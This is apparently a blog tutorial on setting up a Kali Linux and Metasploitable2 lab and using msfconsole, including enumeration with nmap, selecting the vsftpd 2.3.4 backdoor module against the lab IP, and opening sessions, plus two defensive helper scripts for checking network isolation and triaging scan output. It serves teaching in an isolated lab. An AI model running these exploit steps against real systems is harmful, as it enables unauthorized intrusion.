Exploiting Metasploitable2 Using msfconsole (Kali Linux Lab)

Introduction
msfconsole is the heart of the Metasploit Framework and one of the most powerful tools used by penetration testers to identify, exploit, and validate security vulnerabilities. In real-world security assessments as well as Capture The Flag (CTF) challenges, msfconsole is often used to automate and streamline exploitation workflows.
In this blog, we will explore how to use msfconsole from Kali Linux to exploit an intentionally vulnerable machine, Metasploitable2, in a safe and controlled lab environment.
Both machines are hosted on Oracle VM VirtualBox and configured on the same internal network. This setup allows us to simulate real attack scenarios while maintaining proper ethical boundaries.
The goal of this blog is to:
Understand what msfconsole is and why it is used
Learn how attackers interact with vulnerable services using Metasploit
Gain hands-on experience with a realistic exploitation lab
Note: All demonstrations in this blog are performed on machines owned by us or intentionally designed to be vulnerable. Never use these techniques on unauthorized systems.
In the next section, we will briefly look at the lab architecture before launching msfconsole and beginning the exploitation process.
Setting Up msfconsole and Metasploitable2 (Step-by-Step Lab Setup)
Before launching any exploitation using msfconsole, we must ensure that both the attacker and the vulnerable target are properly set up and reachable. This section covers the complete setup process for msfconsole on Kali Linux and the Metasploitable2 vulnerable server.
1. Setting Up the Attacker Machine (Kali Linux)
Why Kali Linux?
Kali Linux comes pre-installed with hundreds of penetration testing tools, including the Metasploit Framework.
Verify Metasploit Installation
On Kali, Metasploit is installed by default. To verify:
msfconsole --version

If Metasploit is installed correctly, you will see version details.
— — — — — — — — — — — — — — — — —
Start msfconsole
msfconsole
On first launch, Metasploit may:
Initialize its database
Create required configuration files
You should now see the familiar msf6 > prompt.
This confirms that msfconsole is ready to use.
— — — — — — — — — — — — — — — — —
2. Setting Up the Target Machine (Metasploitable2)
What is Metasploitable2?
Metasploitable2 is a deliberately vulnerable Linux machine created for practicing penetration testing techniques.
Start Metasploitable2 VM
Launch Metasploitable2 in Oracle VM VirtualBox
Wait until it boots to the login screen
Default Credentials
Username: msfadmin
Password: msfadmin
Log in with these credentials to access the system.
Check IP Address of Metasploitable2
ifconfig
Example output:
inet addr:192.168.56.101
Note this IP address, as it will be used as the target (RHOSTS) inside msfconsole.
— — — — — — — — — — — — — — — — —
3. Ensure Both Machines Are on the Same Network
Both VMs must be configured with:
Network Adapter: Host-only Adapter
Name: VirtualBox Host-Only Ethernet Adapter
This ensures:
Kali ↔ Metasploitable2 communication
No internet exposure (safe lab)
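The host-only requirement above can be checked from the VirtualBox host rather than by eye. This is an added example, not part of the original lab: it parses the output format of `VBoxManage showvminfo <vm> --machinereadable`, and the two VM excerpts embedded in it are constructed samples.

```shell
#!/bin/sh
# Added example: confirm a lab VM has no NIC that can reach beyond the host.
# Real use (the VM name is an assumption):
#   VBoxManage showvminfo "Metasploitable2" --machinereadable | check_isolated

# Constructed excerpts in machinereadable format (not captured from a real VM).
GOOD_VM='name="Metasploitable2"
nic1="hostonly"
hostonlyadapter1="VirtualBox Host-Only Ethernet Adapter"
nic2="none"'

BAD_VM='name="Metasploitable2"
nic1="hostonly"
hostonlyadapter1="VirtualBox Host-Only Ethernet Adapter"
nic2="nat"'

# check_isolated: reads machinereadable VM info on stdin.
# Prints every attached NIC that is not host-only and returns 0 only when the
# VM has at least one host-only NIC and no NIC of any other attached type.
check_isolated() {
  awk -F'"' '
    /^nic[0-9]+=/ {
      slot = $1; sub(/=$/, "", slot)   # "nic2=" -> "nic2"
      mode = $2                        # value between the quotes
      if (mode == "none") next         # slot not attached
      if (mode == "hostonly") { ok++; next }
      printf "%s is attached as %s\n", slot, mode
      bad++
    }
    END { exit ((bad > 0 || ok == 0) ? 1 : 0) }'
}

# Demonstration on the constructed samples.
printf '%s\n' "$GOOD_VM" | check_isolated && echo "sample 1: isolated"
printf '%s\n' "$BAD_VM" | check_isolated || echo "sample 2: NOT isolated"
```

Run it against both the Kali and the Metasploitable2 VM before powering either on; a second adapter left on NAT or bridged mode is the usual way a vulnerable lab VM ends up reachable from outside.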
— — — — — — — — — — — — — — — — —
4. Test Connectivity (Very Important)
From Kali Linux:
ping 192.168.56.101
If you receive replies, your lab network is working correctly.
— — — — — — — — — — — — — — — — —
5. Confirm Target Visibility Using Nmap
Before using Metasploit, attackers always enumerate first.
nmap -sV 192.168.56.101
You should see multiple intentionally vulnerable services, such as
FTP (vsftpd 2.3.4)
SSH
Samba
Tomcat
This confirms that Metasploitable2 is ready for exploitation.
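The same `nmap -sV` output is what a defender reads to find services that need patching or removal. The following is an added example, not part of the original lab: it triages scan output against a watch list of known-bad versions. Only vsftpd 2.3.4 on the watch list comes from this article; the scan text is a constructed sample.

```shell
#!/bin/sh
# Added example: triage `nmap -sV` normal output against a version watch list.

# Watch list of "product version" strings separated by ';'.
# Only vsftpd 2.3.4 is named in the article; extend it from your own baseline.
WATCHLIST='vsftpd 2.3.4'

# Constructed sample in nmap's normal output format (not a real scan).
SAMPLE_SCAN='Nmap scan report for 192.168.56.101
PORT     STATE  SERVICE     VERSION
21/tcp   open   ftp         vsftpd 2.3.4
22/tcp   open   ssh         OpenSSH 4.7p1 (protocol 2.0)
23/tcp   closed telnet
139/tcp  open   netbios-ssn Samba smbd 3.X
8180/tcp open   http        Apache Tomcat/Coyote JSP engine 1.1
9999/tcp open   unknown'

# triage_scan: reads nmap normal output on stdin and prints, for every open
# port, "<port/proto> <service> <flag> <version>". The flag is WATCHLISTED
# (version is on the watch list), NO_VERSION (nothing fingerprinted, review
# by hand) or UNLISTED (fingerprinted, not on the list).
triage_scan() {
  awk -v watch="$WATCHLIST" '
    BEGIN { n = split(watch, w, ";") }
    $1 ~ /^[0-9]+\/(tcp|udp)$/ && $2 == "open" {
      ver = ""
      for (i = 4; i <= NF; i++) ver = (ver == "" ? $i : ver " " $i)
      flag = (ver == "") ? "NO_VERSION" : "UNLISTED"
      for (j = 1; j <= n; j++)
        if (w[j] != "" && (ver == w[j] || index(ver, w[j] " ") == 1))
          flag = "WATCHLISTED"
      printf "%s %s %s %s\n", $1, $3, flag, ver
    }'
}

# count_flag FLAG: number of open ports on stdin that carry the given flag.
count_flag() {
  triage_scan | awk -v f="$1" '$3 == f { c++ } END { print c + 0 }'
}

# Demonstration on the constructed sample.
printf '%s\n' "$SAMPLE_SCAN" | triage_scan
```

UNLISTED only means the version string is not on the list; it is not a statement that the service is safe.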
Setup Checklist
✔ Kali Linux boots successfully
✔ msfconsole launches without errors
✔ Metasploitable2 is accessible
✔ Both machines are on the same subnet
✔ Ping & Nmap scans work
Once all checks pass, your lab is fully prepared.
Basic msfconsole Commands (Getting Comfortable with the Interface)
Before jumping into exploitation, it’s important to understand the basic operating system–style commands and navigation used inside msfconsole. This section helps beginners feel confident while working in the Metasploit environment.
We are using Kali Linux with the Metasploit Framework.
Starting msfconsole
Open a terminal in Kali Linux and run:
msfconsole
Once loaded, you will see:
msf6 >
This prompt indicates that msfconsole is ready to accept commands.
Getting Help in msfconsole
Show All Commands
help
or simply:
?
This lists all available commands, similar to using help in an operating system shell.
Navigation Commands (OS-Like Basics)
Command   Description
pwd       Shows the current module path
cd        Change module directory
ls        List available modules
clear     Clear the screen
Example:
pwd
ls
These commands work inside Metasploit, not the Linux filesystem.
Searching for Modules
One of the most used commands:
search <keyword>
Example:
search ftp
search samba
search vsftpd
This helps you quickly find:
Exploits
Auxiliary scanners
Payloads
Understanding Module Types
Metasploit is organized into different module types, each designed for a specific purpose in the penetration testing lifecycle.
You can list them using:
ls exploit
ls auxiliary
Using a Module
To select a module:
use exploit/unix/ftp/vsftpd_234_backdoor
Once selected, the prompt changes to:
msf6 exploit(unix/ftp/vsftpd_234_backdoor) >
This tells you which module is currently active.
Viewing & Setting Options
Show Required Options
show options
Set Target IP
set RHOSTS 192.168.56.101
Set Port (if needed)
set RPORT 21
To verify:
show options
Running a Module
run
or
exploit
Both commands do the same thing.
Session Management Basics
After successful exploitation:
sessions
Interact with a session:
sessions -i 1
Exit session:
exit
Exiting Modules & msfconsole
In Metasploit, use back to leave the current module and return to the main console. Use quit or exit to close msfconsole completely.
Key Takeaways
✔ msfconsole feels like a mini operating system
✔ search, use, and show options are core commands
✔ Always understand a module before running it
✔ Enumeration comes before exploitation
Conclusion
In this blog, we explored how msfconsole, the core interface of the Metasploit Framework, can be used to exploit a vulnerable FTP service on Metasploitable2 from an attacker machine running Kali Linux.
Starting from proper lab setup and network configuration, we moved through the essential stages of a penetration test: service enumeration, exploit selection, configuration, and execution. By exploiting the outdated vsftpd 2.3.4 service, we demonstrated how a single vulnerable service can lead to full system compromise when basic security practices are ignored.
This exercise highlights several important lessons:
Enumeration is more important than exploitation
Outdated services pose serious security risks
Automation tools like msfconsole must be used with understanding, not blindly
Ethical hacking is about learning and improving security, not breaking systems
Practicing in a controlled environment like Metasploitable2 helps build a strong foundation for CTFs, real-world penetration testing, and defensive security awareness.
In future labs, this knowledge can be extended to:
Exploiting other services such as Samba and Tomcat
Using Meterpreter for advanced post-exploitation
Understanding how blue teams detect and prevent such attacks
Always remember: with great power comes great responsibility. Use these skills only where you have explicit permission.





